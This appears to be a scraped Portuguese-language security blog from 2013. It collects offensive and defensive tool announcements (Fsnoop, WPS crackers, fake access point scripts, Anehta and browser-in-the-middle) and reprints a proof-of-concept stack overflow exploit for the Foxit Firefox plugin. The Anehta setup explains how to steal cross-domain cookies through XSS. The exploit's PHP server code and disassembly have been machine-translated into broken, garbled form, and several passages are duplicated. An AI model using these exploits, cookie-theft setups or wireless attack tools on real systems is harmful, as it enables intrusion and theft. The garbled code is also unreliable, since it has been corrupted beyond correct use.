Very easy, you only need one WPA handshake
Detections believed to be false positives [ use sandbox anyway ]
VIDEO
Crunch _ Aircrack Gui 1.2
terça-feira, abril 09, 2013
Fsnoop - monitor file operations
| In Security Software
Fsnoop
is a tool to monitor file operations on GNU/Linux systems. Its primary purpose is to detect bad temporary file usages and therefore, file race condition vulnerabilities.
Download
- Fsnoop 2.0 (release date: 2013/01/27)
- Fsnoop 1.2 tool renamed (release date: 2012/08/23)
- Dirspy 1.1 (release date: 2012/08/18)
- Dirspy 1.0 (release date: 2012/07/16)
Usage
$ ./fsnoop --help
fsnoop monitors file operations by using the Inotify mechanism.
Usage: fsnoop [OPTIONS] [DIR1[,DIR2,...]] [-- COMMAND]
-d Run as a daemon
-fd Open file descriptors when it's possible
-k Send SIGSTOP signal to the running process (COMMAND)
-o filename Output is redirected to a specific file
-r Monitor directory contents recursively
-t Prefix each line with the time of day
If no DIR is specified, default writable directories such as /tmp,
/var/tmp, /dev/shm, etc. are monitored.
If COMMAND is specified, it will monitor activities during the process
duration.
Output
On events, it displays lines as shown below:[C] -rw------- 1 root root 0 Tue May 8 22:17:10 2012 /var/tmp/test [M] -rw-r--r-- 1 root root 0 Tue May 8 22:17:10 2012 /var/tmp/test [U] -rw-r--r-- 1 root root 1741 Tue May 8 22:17:27 2012 /var/tmp/test [M] -rwxrwxrwx 1 root root 1741 Tue May 8 22:17:27 2012 /var/tmp/test [D] F /var/tmp/testAn event begins with an action character (placed between brackets):
- 'C' for Create;
- 'M' for Modify (means that metadata changed, e.g. permissions, timestamps, link count, UID, GID, etc.);
- 'U' for Update (means that file content was modified);
- 'D' for Delete.
Some examples
To monitor activities in the "/etc" and "/tmp" directories:# ./fsnoop /etc,/tmp Starting fsnoop version 2.0 [+] monitor /etc [+] monitor /tmpTo run Fsnoop as a daemon in order to monitor the "/var/tmp" directory and record activities in the "/root/fsnoop.log" file:
# ./fsnoop -d -t -o /root/fsnoop.log /var/tmp Starting fsnoop version 2.0Output log will look like this:
# cat /root/fsnoop.log [+] monitor /var/tmp (20:10:00) [C] -rw-r--r-- 1 root root 0 Mon Jul 9 20:10:00 2012 /var/tmp/blurb-lock (20:10:00) [M] -rw-r--r-- 1 root root 0 Mon Jul 9 20:10:00 2012 /var/tmp/blurb-lock (20:13:02) [D] F /var/tmp/blurb-lockTo monitor file activities just during a process duration:
$ ./fsnoop /tmp -- Xorg -ac :1 Starting fsnoop version 2.0 [+] monitor /tmpTo send the SIGSTOP signal to a process right after an event occurs:
$ ./fsnoop -k /tmp/.tX1-lock -- Xorg -ac :1 [...] [C] F /tmp/.tX0-lock *** PID 30342 stopped, type [Enter] to resume execution: *** PID 30342 resumed ...To read the content of a file that has been erased:
$ ./fsnoop -fd /var/tmp
[+] monitor /var/tmp
[+] As then "-fd" option is being used, you can launch new shell by
using "ctrl-c" and disclose file descriptors content.
[C] -rw-r--r-- 1 root root 0 Tue Jan 1 21:39:55 2013 /var/tmp/temp.2oPahVp (opened fd=5)
[U] -rw-r--r-- 1 root root 13 Tue Jan 1 21:40:37 2013 /var/tmp/temp.2oPahVp
[D] F /var/tmp/temp.2oPahVp
^C
Here are opened file descriptors. You can display their contents by
using the "cat" command. For example, to display fd #4 use: "cat <&4"
lrwx------ 1 vladz vladz 64 1 janv. 21:43 0 -> /dev/pts/3
lr-x------ 1 vladz vladz 64 1 janv. 21:43 5 -> /var/tmp/temp.2oPahVp (deleted)
fsnoop$ cat <&5
To monitor directories recursively:
If /tmp is being monitored and someone runs:
$ mkdir -p /tmp/a/b/c/d/e/f $ touch /tmp/a/b/c/d/e/f/aEvent will be caught:
$ ./fsnoop -r /tmp [+] monitor /tmp [C] -rw-r--r-- 1 vladz vladz 0 Thu Jan 24 13:10:30 2013 /tmp/a/b/c/d/e/f/a
Credits
Thanks to Larry Cashdollar for testing the tool and bringing new ideas.Workshop Proposal Submission Deadline ( Security Focus )
| In noticias
Workshop Proposal Submission Deadline: April 15, 2013
------------------------------
Paper Submission Deadline: June 1, 2013
------------------------------
Washington D.C. USA, September 8-14, 2013.
http://www.asesite.org/events/
------------------------------
1. 2013 ASE/IEEE International Conference on Big Data
http://www.asesite.org/
2. 2013 ASE/IEEE International Conference on Social Computing
http://www.asesite.org/
3. 2013 ASE/IEEE International Conference on Economic Computing
http://www.asesite.org/
4. 2013 ASE/IEEE International Conference on Biomedical Computing
http://www.asesite.org/
5. 2013 ASE/IEEE International Conference on Privacy, Security, Risk and Trust
http://www.asesite.org/
------------------------------
Paper Submission Deadline: June 1, 2013
------------------------------
Washington D.C. USA, September 8-14, 2013.
http://www.asesite.org/events/
------------------------------
1. 2013 ASE/IEEE International Conference on Big Data
http://www.asesite.org/
2. 2013 ASE/IEEE International Conference on Social Computing
http://www.asesite.org/
3. 2013 ASE/IEEE International Conference on Economic Computing
http://www.asesite.org/
4. 2013 ASE/IEEE International Conference on Biomedical Computing
http://www.asesite.org/
5. 2013 ASE/IEEE International Conference on Privacy, Security, Risk and Trust
http://www.asesite.org/
EC- Council Conference & Event's
| In noticias
|
Bitmessage - mensagens criptografadas
| In Cryptografia
Ele usa uma autenticação forte, o que significa que o remetente de uma mensagem não pode ser falsificado, e tem como objetivo esconder "sem conteúdo" de dados, como o emissor eo receptor de mensagens, de bisbilhoteiros passivos como aqueles que executam programas de escutas telefônicas sem mandado.
Um cliente de código aberto está disponível gratuitamente sob a licença MIT muito liberal. Para imagens e uma descrição do cliente, consulte este artigo CryptoJunky: "configurar e usar Bitmessage"
Download: https://bitmessage.org/wiki/Main_Page
domingo, janeiro 20, 2013
Modelo de relatório sobre Ensaio de Intrusão
Boa Tarde A todos!
- Muitas pessoas me perguntam sobre trabalhar com segurança da informação, que quer implementar IDS, IPS, redes de alta disponibilidade, Quais as vantagens e desvantagens de optar apenas por este Ramo. Como qualquer outro o caminho é árduo a seguir, certificações e graduações são preponderantes para se obter sucesso profissional e por que não pessoal ( PNL ) , como já citei em uma postagem anterior.
- Acompanho muito as postagens do Dragonjar, que tem uns 10 anos de experiencia no ramo, e não é apenas por posts "l33tmothafoker hacking oldschool " não, sim pelo que auxilia para comunidade. Achei importante compartilhar um material sobre Modelos de relatórios de analise de intrusão, sem delongas.
Segue:
- Muitas pessoas me perguntam sobre trabalhar com segurança da informação, que quer implementar IDS, IPS, redes de alta disponibilidade, Quais as vantagens e desvantagens de optar apenas por este Ramo. Como qualquer outro o caminho é árduo a seguir, certificações e graduações são preponderantes para se obter sucesso profissional e por que não pessoal ( PNL ) , como já citei em uma postagem anterior.
- Acompanho muito as postagens do Dragonjar, que tem uns 10 anos de experiencia no ramo, e não é apenas por posts "l33tmothafoker hacking oldschool " não, sim pelo que auxilia para comunidade. Achei importante compartilhar um material sobre Modelos de relatórios de analise de intrusão, sem delongas.
Segue:
Server Shield - Hardening linux
Features
- Firewall Hardening
- TCP Hardening
- Data Leakage Protection
- ICMP/Ping Flood Protection
- Rootkit Protection
- DoS Protection
- Spoof Protection
- Bogus TCP Protection
- SYN Flood Protection
- Requires
- iptables ("yum install iptables")
Installation
git clone https://github.com/Brian-Holt/server-shield
cd server-shield;chmod +x sshield;mv sshield /etc/init.d
/etc/init.d/sshield start
Download Server Shield v1.0.2
Download Server Shield v1.0.2
Junkie - The Network Sniffer
Compared to previously available tools junkie lies in between tcpdump and wireshark. Unlike tcpdump, its purpose is to parse protocols of any depth; unlike wireshark, through, junkie is designed to analyze traffic in real-time and so cannot parse traffic as completely as wireshark does.
In addition, junkie's design encompasses extendability and speed:
- plug-in system + high-level extension language that eases the development and combination of new functionalities;
- threaded packet capture and analysis for handling of high bandwidth network;
- modular architecture to ease the addition of any protocol layer;
- based on libpcap for portability;
- well tested on professional settings.
Junkie is still being maintained and extended by SecurActive dedicated team but we believe it can be further extended to fulfill many unforeseen purposes.
Todo
Protocol discovery
- Automatically convert from bro/l7-filter/snort filters to junkie protocol discovery
- When we found out a proto for TCP (that we know how to parse), register it both ways (using connection tracking hash?)
Netmatch language
- a type for signed integers (in a way or another - maybe the few operators that really care should exist in two variants?);
- another special form for converting a name to an
ip_addr(or a regular function if we optimize constant away from runtime exec - see below about purity); - pure functions taking only constants (and thus returning a constant) should be precomputed;
- a slice operator to extract a string from another string;
- it should be correct to match with:
(eth) ((ip) (...) or (arp) (...)). in other words, the proto list should be a special form (binding current protos) rather than a fixed preamble. - a list of every valid fields (with a docstrings) for better error messages;
- a higher level language resembling wireshark's, with automatic insertion of
set?predicates;
Nettrack language
- A www plugin to display each netgraph state;
- rehashable states (once the global hash will be refactored into an incrementaly resized hash)
Reports
A plugin to use the aforementioned FSM executable rules to build report to help classify traffic;
Netflow
Using the above report facility, produce netflow statistics (and stream it).
Minor
- writer www plugin must mergecap fractionned pcap files for download;
- automatic resolution of inter-modules dependancies during init;
Parsers for:
- H323
- SCCP
- SMB
- MSSQL
- Accounting protocols (such as RADIUS & DIAMETER)
Anehta V-0.6 - Web Application Security Audit Tool
Anehta é uma ferramenta Web Pedido de Auditoria de Segurança, escrito em PHP / JavaScript projetado para fazer cross site scripting e ataques de outros web mais fácil e automatizado.
Instalar e configurar:
1. Descompactar todos os arquivos de um diretório em seu servidor
2. Verifique se o seu diretório tem a permissão de gravação.
3. Modificar U $ $ como nome de usuário e senha em P como "servidor de classe / / auth_Class.php" arquivo.
Nome de usuário padrão é "admin" ea senha padrão é "123456".
4. Se você quiser enviar e-mails, modificar "servidor / mail.php" arquivo para o seu próprio servidor de email ou caixa de correio.
Início Rápido:
1. Faça login e voltar para a guia Configurar.
2. Introduzir o "anehtaurl" como o endereço onde seu anehta é.
Por exemplo: "http://www.a.com/anehta".
3. Você também deve inserir o src bumerangue e alvo bumerangue.
src bumerangue é normalmente a mesma página onde você coloca seus feed.js é.
Por exemplo: src boomerang talvez: "http://www.b.com/xssed.html?param = ".
alvo bumerangue deve ser a página onde você quer roubar o cookie de domínio cruzado.
Por exemplo: alvo boomerang talvez: "http://www.alimafia.com/xssDemo.html # '> <'".
Você pode modificar feed.js para cancelar o módulo xcookie se você não quiser usar bumerangue. Mas você deve sempre definir valores bumerangue src e alvo quando você modificar na guia de configuração.
4. Depois configure modificado, basta carregar feed.js como um script externo para onde sua página xss é. Há também uma página de demonstração no diretório que é "demo.html"
5. Atualizar a admin.php, e você pode ver algumas mudanças se o seu escravo xss vinda.
Download:
| File: | |
|---|---|
| Description: | === Enviroment === 1. PHP4/5 (PHP5 is recommended) 2. Apache or IIS === Install & Configure === 1. Decompress all the files in a directory on your server 2. Make sure your directory has the write permission. 3. Modify $U as username and $P as password in "server/class/auth_Class.php" file. Default username is "admin" and default password is "123456". 4. If you want to send mail, modify "server/mail.php" file to your own mail server or mailbox. === Quick Start === 1. Login and turn to the Configure tab. 2. Input the "anehtaurl" as the url where your anehta is. For example: "http://www.a.com/anehta". 3. You should also input the boomerang src and boomerang target. boomerang src is usually the same page where you put your feed.js is. For example: boomerang src maybe: "http://www.b.com/xssed.html?param=". boomerang target must be the page where you want to steal cross domain cookie. For example: boomerang target maybe: "http://www.alimafia.com/xssDemo.html#'><'". You can modify feed.js to cancel the xcookie module if you do not want to use boomerang. But you must always set boomerang src and target values when you modify in the configure tab. 4. After modified configure, simply load feed.js as a external script to where your xss page is. There is also a demo page in the directory which is "demo.html" 5. Refresh the admin.php, and you may see some changes if your xss slave coming. === More Support === Home page: http://anehta.googlecode.com Blog: http://hi.baidu.com/aullik5 (Many Docs here) Demo Video: http://hi.baidu.com/aullik5/blog/item/cb4cd5899283b093a4c272a9.html Author: axis@ph4nt0m.org Feel free to tell me your advise. |
| SHA1 Checksum: | 623853b2d834e696b4c264c22ef877ecfa588fbb What's this? |
Pentoo - Security Focused Livecd
- Kernel 2.6.31.6 with lzma and aufs patches
- Wifi stack 2.6.32_rc7
- Module loading support ala slax
- Changes saving on usb stick
- Enlightenment DR17 WM
- Cuda/OPENCL cracking support with development tools
- System updates if you got it finally installed
Put simply, Pentoo is Gentoo with the pentoo overlay. This overlay is available in layman so all you have to do is layman -L and layman -a pentoo.
Bizploit - ERP Penetration Testing framework.
| In Security Software
- Onapsis Bizploit
- Bizploit is the first Opensource ERP Penetration Testing framework. Developed by the Onapsis Research Labs, Bizploit assists security professionals in the discovery, exploration, vulnerability assessment and exploitation phases of specialized ERP Penetration Tests.
Currently, Bizploit is shipped with many plugins to assess the security of SAP business platforms. Plugins for other popular ERPs will be included in the short term. - Download Bizploit v1.50-rc1 for Windows
- Download Bizploit v1.50-rc1 for Linux
browser-in-the-middle , I love IT! :D
browser-in-the-middle is a bashscript that uses ettercap, metasploit and the beEF framework to make attacks that injects code in pages users visited on the internet from the local network.
- uses ettercap to launch a man in the middle attack
- ettercap modifies traffic so evil javascript or iframes are added
- victim's browser will be redirect to the attackers webserver
- the webserver will be running the msf autopwn module or the beEF framework to launch browserexploits are other browser related attacks.
| File: | |
|---|---|
| Description: | Not working bash script to test if I can upload files. |
| SHA1 Checksum: | 0fe79f78dd385433edb70279306fc4974b9f0c77 What's this? |
browser-in-the-middle - Script
Browser-in-the-middle is a bashscript that uses ettercap, metasploit and the beEF framework to make attacks that injects code in pages users visited on the internet from the local network.
- uses ettercap to launch a man in the middle attack
- ettercap modifies traffic so evil javascript or iframes are added
- victim's browser will be redirect to the attackers webserver
- the webserver will be running the msf autopwn module or the beEF framework to launch browserexploits are other browser related attacks.
| File: | |
|---|---|
| Description: | Not working bash script to test if I can upload files. |
| SHA1 Checksum: | 0fe79f78dd385433edb70279306fc4974b9f0c77 What's this? |
Wifi - Honey - Criando Ap's falsa (:
Vou deixar a descrição original (:
This is a script, attack can use to creates fake APs using all encryption and monitors with Airodump. It automate the setup process, it creates five monitor mode interfaces, four are used as APs and the fifth is used for airdump-ng. To make things easier, rather than having five windows all this is done in a screen session which allows you to switch between screens to see what is going on. All sessions are labelled so you know which is which.
Installing wifi honey
chmod a+x wifi_honey.sh
./wifi_honey.sh fake_wpa_net
./wifi_honey.sh fake_wpa_net 1 waln1
Download Wifi Honey
Installing wifi honey
chmod a+x wifi_honey.sh
./wifi_honey.sh fake_wpa_net
./wifi_honey.sh fake_wpa_net 1 waln1
Download Wifi Honey
WPSCRACKGUI - Graphical tool for cracking WPS Wireless Pin
changelog v1.2.1 :
* The Portuguese language was added.
* Was added the Kozumi Keygen.
* Was added the Edimax Keygen.
* Was added the Belkin Keygen.
* Was added the Nisuta Keygen.
* Update Database to: # 301 Pines, # 120 MAC Address.
* Fixed bugs in General.
* Was added the Kozumi Keygen.
* Was added the Edimax Keygen.
* Was added the Belkin Keygen.
* Was added the Nisuta Keygen.
* Update Database to: # 301 Pines, # 120 MAC Address.
* Fixed bugs in General.
Graphical interface to the network cracking WPS Reaver.
features :- Graphic User Interface (GUI) WPS encryption cracking.
- Advanced Attack with Generic Dictionary.
- Advanced Dictionary Attack with Enhanced.
- Updated Assisted Reaver-WPS.
- Database with PINs.
- Change MAC Address.
- Supported in Gt and Gtk.
- Scan networks.
Download version :
WPSCrackGUI-v1.2.2beta-G3.gambas (677.0 kB)
Debian : wpscrackgui_1.2.1-1_ubuntu.deb (313.3 KB)
opensuse : wpscrackgui-1.2.1-1_opensuse.rpm (316.4 kB)
MANDRIVA : wpscrackgui-1.2.1-1_mandriva.rpm (318.7 kB)
Fedora : wpscrackgui-1.2.1-1_fedora.rpm (316.4 kB)
Find Other Version |
Resources : http://www.arg-wireless.com.ar/
fonte: seclist.us
WPSCrackGUI-v1.2.2beta-G3.gambas (677.0 kB)
Debian : wpscrackgui_1.2.1-1_ubuntu.deb (313.3 KB)
opensuse : wpscrackgui-1.2.1-1_opensuse.rpm (316.4 kB)
MANDRIVA : wpscrackgui-1.2.1-1_mandriva.rpm (318.7 kB)
Fedora : wpscrackgui-1.2.1-1_fedora.rpm (316.4 kB)
Find Other Version |
Resources : http://www.arg-wireless.com.ar/
fonte: seclist.us
Vulnerabilidade crítica no plugin de Foxit PDF para o Firefox
A partir do Adobe Reader X é orientado para a área de segurança de segurança e correções aplicadas e aplicada devido a múltiplas vulnerabilidades descobertas por um exército de beta testersdispostos a abrir as portas para seus artefatos maliciosos. Então, talvez o Foxit Reader não é o inimigo público número um, mas isso não significa mais seguro.
O consultor italiano Andrea Micalizzi, aka rgod , nos lembrou recentemente pela publicação de uma vulnerabilidade que afeta, sim, o plugin do Foxit PDF para o navegador . Ou seja, o erro não está presente no leitor de PDF em si, se não na biblioteca npFoxitReaderPlugin.dll que atua como um intermediário entre o navegador eo Foxit Reader.
Especificamente, o código é vulnerável a um estouro de pilha no processamento de pedidos de ligações longa . A prova de conceito é claro: agora trabalha na versão mais recente do Firefox (18,0) e da última versão do Foxit Reader (5.4.4.1128) com o seu plugin (2.2.1.530).
Vamos olhar para código l de rgod:
<? php * / Foxit Reader <= Plugin para Firefox 5.4.4.1128 overlong npFoxitReaderPlugin.dll Query String remoto Stack Buffer Overflow PoC rgod --------------------------- (Ouvinte) Testado contra Microsoft Windows Mozilla Firefox 17.0.1 Foxit Reader 5.4.3.0920 Foxit Reader 5.4.4.1128 Arquivo: npFoxitReaderPlugin.dll Versão: 2.2.1.530 Url produto: http://www.foxitsoftware.com/downloads/ Arquivo de instalação última versão: FoxitReader544.11281_enu_Setup.exe Uso: Lançamento da linha de comando, em seguida, navegar com o Firefox porta 6666. Você também pode testá-lo através do site: http://192.168.0.1/x.pdf? [A x 1024] Arquivo deve ser existentes ou o servidor deve estar respondendo com o cabeçalho Content-Type adequada. código vulnerável, npFoxitReaderPlugin.dll: , ------------------------------------------------- ----------------------------- L1000162F: empurrar ebx empurrar esi empurrar edi mov edi, ebp ou ecx, FFFFFFFFh xor eax, eax xor ebx, ebx esi xor, esi REPNE SCASB não ecx dezembro ecx teste ecx, ecx jle L100016E4 L1000164A: mov al, [esi + ebp] mov word ptr [esp 18 h], 0000h cmp al, 25h jz L10001661 mov ecx, [esp Ch 1] mov [ebx + ecx], o jmp L100016CE L10001661: mov al, [esi + ebp 01 h] cmp al, 30h jl L1000166D cmp al, 39h jle L1000167D L1000166D: cmp al, 41h jl L10001675 cmp al, 46h jle L1000167D L10001675: cmp al, 61H jl L100016C6 cmp al, 66h jg L100016C6 L1000167D: mov dl, [esi + ebp 01 h] esi inc esi inc leia ecx, [esp +10 h] mov [esp 18 h], dl empurrar ecx mov al, [esi + ebp] lea edx, [esp Ch 1] empurrar L100450D4 empurrar edx mov [esp 25 h], o chamar SUB_L10006421 mov eax, [esp Ch 1] leia ecx, [esp 24 h] empurrar eax empurrar L100450D0 empurrar ecx chamar SUB_L100063CF mov eax, [esp 34 h] mov dl, [esp 30 h] adicionar esp, 00000018h mov [ebx + eax], dl jmp L100016CE L100016C6: mov ecx, [esp Ch 1] mov byte ptr [ebx + ecx], 25h L100016CE: inc ebx mov edi, ebp ou ecx, FFFFFFFFh xor eax, eax esi inc REPNE SCASB não ecx dezembro ecx cmp esi, ecx jl L1000164A L100016E4: mov edx, [esp Ch 1] edi pop esi pop mov eax, 00000001H mov byte ptr [ebx + edx], 00h pop ebx pop ebp pop ecx retn , ------------------------------------------------- ----------------------------- copiar este ciclo termina em substituição ponteiros de pilha, em seguida, (Ao ligar para plugin-container.exe): (F48.1778): violação de acesso - código c0000005 (primeira chance) Exceções de primeira chance são relatados antes de qualquer tratamento de exceção. Essa exceção pode ser esperado e manipulados. eax = 00000341 ebx = 0076ed4c 002cf414 edx = ecx = esi = 41414141 edi = 002cf414 0076e9e8 eip = 10016852 esp = 002cf3f8 ebp = iopl = 0 nv up ei pl 75eacdf8 nz nd po nc cs = 001b ss = 0023 ds = 0023 es = 0023 fs = 003b gs = 0000 efl = 00010202 ! npFoxitReaderPlugin NP_GetEntryPoints 0 x15672: 10016852 8906 mov dword ptr [esi], eax ds: 0023:41414141 =???? ... Tentativa de escrever para tratar 41414141 ... Também ponteiros SEH são substituídas * / error_reporting ( 0 ); set_time_limit ( 0 ); $ Porta = 6666 ; ____ $ Redirecionar = "HTTP/1.1 301 Movido Permanentemente \ r \ n" . "Servidor: Apache \ r \ n" . "Localização:? / x.pdf" . str_repeat ( "A" , 1024 .) "\ r \ n " . Content-Type ": text / html \ r \ n \ r \ n" ; $ ____ Crescimento = "HTTP/1.1 200 OK \ r \ n" . "Servidor: Apache \ r \ n" . "Accept-Ranges: bytes \ r \ n" . "Content-Length: 60137 \ r \ n" . " ": Content-Type application / pdf \ r \ n . "Connection: keep-alive \ r \ n \ r \ n" ; $ Socket = stream_socket_server ( "tcp :/ / 0.0.0.0" . $ port , $ errno , $ errstr ); se (! $ socket ) { ECHO "$ errstr ($ errno) \ n" ; } mais { ECHO "escutando na porta TCP público" . $ port . "\ n" ; enquanto ( $ conn = stream_socket_accept ( $ socket )) { $ linha = fgets ( $ conn ); senhorita
Agora, execute o php (x.php no meu exemplo) a partir da linha de comando do nosso Windows 7:
D : \ xampplite \ htdocs > d : \ xampplite \ php \ php . exe - fx . php Ouvir em público a porta TCP 6666 GET / x . pdf ? AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA / 1,1E, finalmente, visam corrigir o endereço e porta no navegador:
Como você pode ver, temos causou o acidente do plugin com despeinarnos pouco ...
Atualmente não há nenhuma atualização para resolvê-lo e outras versões do Foxit Reader e outros navegadores (Firefox, Chrome e Safari) podem ser vulneráveis, por isso é recomendável desabilitar o plugin até novo aviso:
Para desativar arquivos PDF não será aberto diretamente no navegador e será carregado em um novo processo de Foxit Reader, evitando assim o uso do plugin DLL vulnerável.
Fonte: vulnerabilidade reportada no Foxit PDF Plugin para o Firefox - como mitigá-la
Atualização: 18 / 01/2012 : Foxit patches críticos vulnerabilidade no PDF-reader para navegadores http://t.co/SJo63dAW
fonte: hackplayers.com
